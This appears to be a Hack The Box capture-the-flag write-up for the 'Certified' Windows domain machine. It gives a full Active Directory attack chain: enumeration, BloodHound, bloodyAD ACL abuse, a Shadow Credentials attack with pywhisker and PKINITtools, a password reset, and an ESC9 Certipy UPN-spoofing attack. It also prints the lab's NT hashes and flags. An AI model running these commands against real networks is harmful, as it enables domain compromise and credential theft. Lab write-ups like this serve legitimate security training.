Box Info

Name:Certified
OS: Windows
Difficulty: Medium
IP: 10.10.11.41

Setup

mkdir -p ~/ctf/HackTheBox/certified/scans; cd ~/ctf/HackTheBox/certified

IP Address: 10.10.11.41

echo "10.10.11.41 certified.htb" | sudo tee -a /etc/hosts

10.10.11.41 certified.htb

As this is a Assumed Breach scenario Box, we are given the following credentials to start with:

judith.mader:judith09

Enumeration

nmap -sC -sV -Pn -p- certified.htb -oN scans/nmap -vv

nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 certified.htb

# nmap findings
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49689/tcp open  unknown          syn-ack ttl 127
49690/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49720/tcp open  unknown          syn-ack ttl 127
49729/tcp open  unknown          syn-ack ttl 127

now using Netexec and the provided credentials, we enumerate ldap(port 389) and smb(port 445).

Users:

Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

Using LDAP enumeration, we find that the user management_svc is Kerberoastable:

Using Hashcat we try to crack this password .\hashcat.exe -m 13100 .\hash.txt .\rockyou.txt but were unsuccessfull.

Using nxc ldap 10.10.11.41 -d certified.htb -u judith.mader -p judith09 --dns-server 10.10.11.41 --bloodhound -c All we get a bloodhound zip file to enumerate further.

using Bloodhound we find that we can traverse to ca_operator using the below path:

Setting Managment group’s owner to Judith

Using the bloodyAD tool we set the owner to judith: bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 set owner Management judith.mader

Using the below command we give judith genericAll rights to Management group so that we can add judith to the group bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader

Now we add judith user to Managment so that we can also have GenericWrite rights on Managment_SVC User.

bloodyAD --host 10.10.11.41 -d certified.htb -u judith.mader -p judith09 add groupMember Management judith.mader

GenericWrite on Management_SVC

to exploit this we have to use PyWhiskers to exploit Shadow Credentials.

./pywhisker -d certified.htb -u judith.mader -p judith09 --target management_svc --action add --filename mgmt_svc

python3 PKINITtools/gettgtpkinit.py -cert-pfx venv/bin/mgmt_svc.pfx -pfx-pass xXGg4pFUaqdvN04gqYuF certified.htb/management_svc management_svc.ccache

python3 PKINITtools/getnthash.py -key 1ff1c8b4ea8d572eb1f773b5481a026a23e10b2a724caeb889ee398319724525 certified.htb/management_svc

From the above shadow attack we get the NT hash for management_svc user

management_svc:a091c1832bcdd4677c28b5a6a1295584

Using Netexec we verify this is the correct hash

We have winrm on management_svc

User Flag

Location: C:\Users\management_svc\Desktop | Flag: b4f932ca96fde437b29e2b73dd312357

Privilege Escalation

GenericAll rights on CA_Operator

using bloodyAD --host 10.10.11.41 -d certified.htb -u management_svc -p :a091c1832bcdd4677c28b5a6a1295584 set password ca_operator Password@1! we change the password for ca_operator account as we have the genericall rights on management_svc.

Certipy

Using certipy find -u ca_operator@certified.htb -p 'Password@1!' -dc-ip 10.10.11.41 -vulnerable -text -enabled we find that ‘CertifiedAuthentication’ Template is vulnerable to ESC9 - Template has no security extension.

Since we have GenericAll from Management_SVC-> CA_operator

Using certipy account update -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator, we spoof the upn for ca_operator

Using certipy req -username ca_operator@certified.htb -hashes dbf36575210cc5a38ab4050cc6a2e9aa -ca certified-DC01-CA -template CertifiedAuthentication we request the certificate, Since this template disables security checks and trusts the UPN field.

Using the obtained certificate we authenticate and get the NT hash using certipy auth -dc-ip '10.10.11.41' -pfx 'administrator.pfx' -username 'administrator' -domain 'certified.htb'

administrator:0d5b49608bbce1751f708748f67e2d34

Now we revert the upn for ca_operator back to original

We verify the access using nxc and evil-winrm:

Root Flag

Location: C:\Users\Administrator\Desktop | Flag: a5404d7db96e03dfa194c6ba6c04dffb

Setup#

Enumeration#

Setting Managment group’s owner to Judith#

GenericWrite on Management_SVC#

User Flag#

Privilege Escalation#

GenericAll rights on CA_Operator#

Certipy#

Root Flag#